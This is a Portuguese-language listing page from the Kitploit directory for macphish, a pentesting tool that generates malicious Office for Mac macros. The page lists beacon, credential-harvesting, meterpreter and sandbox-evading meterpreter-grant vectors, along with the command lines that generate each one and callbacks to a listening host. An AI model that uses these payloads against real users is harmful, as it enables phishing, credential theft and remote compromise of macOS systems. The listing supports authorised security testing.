Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
macphish — Gera macros maliciosos do Office para Mac com beacons, coleta de credenciais e payloads meterpreter para testes de phishing e exploração no macOS. | Kitploit
Ferramentas/GitHubGitHub/cldrn/macphish
Geração de PayloadsExploraçãoPhishing
GitHubcldrn/macphish

macphish

Gera macros maliciosos do Office para Mac com beacons, coleta de credenciais e payloads meterpreter para testes de phishing e exploração no macOS.

Ver Repositório
2455094há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

macphish

Gerador de Payload de Macro para Office no Mac macphish

Vetores de ataque

Há 4 vetores de ataque disponíveis:

  • beacon
  • creds
  • meterpreter
  • meterpreter-grant

Para o método 'creds', o macphish pode gerar o script Applescript diretamente, caso você precise executá-lo a partir de um shell.

beacon

Ao ser executado, este payload sinalizará nosso host de escuta e fornecerá informações básicas do sistema sobre a vítima. A maneira mais simples de gerar um payload beacon é:

$./macphish.py -lh <listening host> 

Por padrão, ele usa curl, mas outros utilitários (wget, nslookup) podem ser usados modificando o modelo de comando.

creds

$./macphish.py -lh <listening host> -lp <listening port> -a creds

meterpreter

A maneira mais simples de gerar um payload meterpreter é:

$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter 

meterpreter-grant

Para gerar um payload meterpreter que chama GrantAccessToMultipleFiles() primeiro:

$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter-grant

Para ataques meterpreter, apenas payloads em python são suportados no momento.

Uso

Veja https://github.com/cldrn/macphish/wiki/Usage

PoCs

  • Evasão de sandbox usando GrantAccessToMultipleFiles no Word para Mac
  • PoC de permissões globais e recursivas - Macros maliciosas para Word no MacOS
  • Execução de Meterpreter no Office para Mac com macros
  • Captura de credenciais (phishing) com macros do Word no macOS
Baixar ferramenta